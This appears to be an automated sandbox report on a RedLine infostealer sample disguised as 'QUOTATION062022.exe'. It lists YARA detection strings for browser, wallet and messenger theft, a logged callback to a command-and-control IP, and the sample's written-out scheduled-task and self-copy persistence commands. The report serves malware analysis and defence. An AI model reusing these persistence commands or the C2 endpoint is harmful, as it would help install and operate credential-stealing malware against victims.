11.2.Data.exe.3ae2f90.2.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
11.2.Data.exe.3ae2f90.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
11.2.Data.exe.3ae2f90.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
23.2.vbc.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
23.2.vbc.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
23.2.vbc.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
23.2.vbc.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165e6:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165c7:$v2_6: GetUpdates
11.2.Data.exe.3ae2f90.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x280aa:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x2b761:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x20d50:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x2ac99:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x282ab:$v2_2: get_ScanVPN 0x2834e:$v2_2: get_ScanFTP
4.0.vbc.exe.400000.3.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
4.0.vbc.exe.400000.3.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.0.vbc.exe.400000.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.0.vbc.exe.400000.3.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165e6:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165c7:$v2_6: GetUpdates
4.0.vbc.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
4.0.vbc.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.0.vbc.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.0.vbc.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165e6:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165c7:$v2_6: GetUpdates
11.2.Data.exe.3acb170.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
11.2.Data.exe.3acb170.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
11.2.Data.exe.3acb170.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.Data.exe.3acb170.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x282aa:$u7: RunPE 0x3feca:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x2b961:$u8: DownloadAndEx 0x43581:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x20f50:$pat14: , CommandLine: 0x38b70:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x2ae99:$v2_1: ListOfProcesses 0x42ab9:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers
Click to see the 71 entries

HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.90:17910Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: api.ip.sb

System Summary

Malicious sample detected (through community Yara rule)

Source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 4.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.QUOTATION062022.exe.39e2f90.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 11.2.Data.exe.3acb170.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 11.2.Data.exe.3ae2f90.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 23.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 23.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.QUOTATION062022.exe.39cb170.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 23.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.QUOTATION062022.exe.39cb170.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.QUOTATION062022.exe.39e2f90.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 23.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 23.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 23.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 11.2.Data.exe.3ae2f90.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 4.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 11.2.Data.exe.3acb170.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: QUOTATION062022.exe

Source: QUOTATION062022.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 4.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.QUOTATION062022.exe.39e2f90.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 11.2.Data.exe.3acb170.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 11.2.Data.exe.3ae2f90.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 23.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 23.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.QUOTATION062022.exe.39cb170.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 23.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.QUOTATION062022.exe.39cb170.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.QUOTATION062022.exe.39e2f90.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 23.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 23.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 23.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 11.2.Data.exe.3ae2f90.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 4.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 11.2.Data.exe.3acb170.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073

Source: C:\Users\user\Desktop\QUOTATION062022.exe	Code function: 0_2_0280A28F	0_2_0280A28F
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Code function: 0_2_02802CB5	0_2_02802CB5
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Code function: 0_2_04E7AF60	0_2_04E7AF60
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Code function: 0_2_04E70040	0_2_04E70040
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Code function: 0_2_04E7560C	0_2_04E7560C
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Code function: 0_2_04E80040	0_2_04E80040
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Code function: 0_2_04E856C8	0_2_04E856C8
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Code function: 0_2_04E90040	0_2_04E90040
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Code function: 0_2_04E95728	0_2_04E95728
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Code function: 0_2_04EB8E79	0_2_04EB8E79
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Code function: 0_2_04EB1C78	0_2_04EB1C78
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Code function: 0_2_04EB7E64	0_2_04EB7E64
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Code function: 0_2_04E8001E	0_2_04E8001E
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Code function: 0_2_04E856B9	0_2_04E856B9
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Code function: 0_2_04E95718	0_2_04E95718
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Code function: 0_2_04E7AF50	0_2_04E7AF50
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Code function: 0_2_04E7001F	0_2_04E7001F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0588DE10	4_2_0588DE10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0588FA30	4_2_0588FA30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0588D2F0	4_2_0588D2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_073668F8	4_2_073668F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0736BE80	4_2_0736BE80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_07361D98	4_2_07361D98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_07362610	4_2_07362610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_07360190	4_2_07360190

Source: C:\Users\user\Desktop\QUOTATION062022.exe

Code function: 0_2_0280F458 CreateProcessAsUserA,

0_2_0280F458

Source: QUOTATION062022.exe, 00000000.00000002.294290970.00000000039CA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs QUOTATION062022.exe
Source: QUOTATION062022.exe, 00000000.00000002.293203410.00000000029C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs QUOTATION062022.exe

Source: QUOTATION062022.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: QUOTATION062022.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Data.exe.9.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Data.exe.9.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: QUOTATION062022.exe	Virustotal: Detection: 47%
Source: QUOTATION062022.exe	ReversingLabs: Detection: 48%

Source: QUOTATION062022.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\QUOTATION062022.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\QUOTATION062022.exe "C:\Users\user\Desktop\QUOTATION062022.exe"
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C copy "C:\Users\user\Desktop\QUOTATION062022.exe" "C:\Users\user\AppData\Roaming\Data\Data.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Data\Data.exe C:\Users\user\AppData\Roaming\Data\Data.exe
Source: C:\Users\user\AppData\Roaming\Data\Data.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Data\Data.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f
Source: C:\Users\user\AppData\Roaming\Data\Data.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C copy "C:\Users\user\AppData\Roaming\Data\Data.exe" "C:\Users\user\AppData\Roaming\Data\Data.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C copy "C:\Users\user\Desktop\QUOTATION062022.exe" "C:\Users\user\AppData\Roaming\Data\Data.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Data\Data.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Data\Data.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Data\Data.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C copy "C:\Users\user\AppData\Roaming\Data\Data.exe" "C:\Users\user\AppData\Roaming\Data\Data.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Source: C:\Users\user\Desktop\QUOTATION062022.exe

File created: C:\Users\user\AppData\Roaming\Data

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

File created: C:\Users\user\AppData\Local\Temp\tmp772C.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@24/53@4/2

Source: QUOTATION062022.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Data\Data.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior

Source: QUOTATION062022.exe, IgnoreSymbols.cs	Base64 encoded string: 'GOdYbjf0HH/3c4u/gKAthdsOgjVR+eO32MIXA5prvnEZywjJbqkx9UK5f+cQ/zSTBzxYm4vEbHo='
Source: 0.2.QUOTATION062022.exe.890000.0.unpack, IgnoreSymbols.cs	Base64 encoded string: 'GOdYbjf0HH/3c4u/gKAthdsOgjVR+eO32MIXA5prvnEZywjJbqkx9UK5f+cQ/zSTBzxYm4vEbHo='
Source: 0.0.QUOTATION062022.exe.890000.0.unpack, IgnoreSymbols.cs	Base64 encoded string: 'GOdYbjf0HH/3c4u/gKAthdsOgjVR+eO32MIXA5prvnEZywjJbqkx9UK5f+cQ/zSTBzxYm4vEbHo='
Source: Data.exe.9.dr, IgnoreSymbols.cs	Base64 encoded string: 'GOdYbjf0HH/3c4u/gKAthdsOgjVR+eO32MIXA5prvnEZywjJbqkx9UK5f+cQ/zSTBzxYm4vEbHo='
Source: 11.2.Data.exe.e00000.0.unpack, IgnoreSymbols.cs	Base64 encoded string: 'GOdYbjf0HH/3c4u/gKAthdsOgjVR+eO32MIXA5prvnEZywjJbqkx9UK5f+cQ/zSTBzxYm4vEbHo='
Source: 11.0.Data.exe.e00000.0.unpack, IgnoreSymbols.cs	Base64 encoded string: 'GOdYbjf0HH/3c4u/gKAthdsOgjVR+eO32MIXA5prvnEZywjJbqkx9UK5f+cQ/zSTBzxYm4vEbHo='

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6876:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6916:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6772:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6528:120:WilError_01
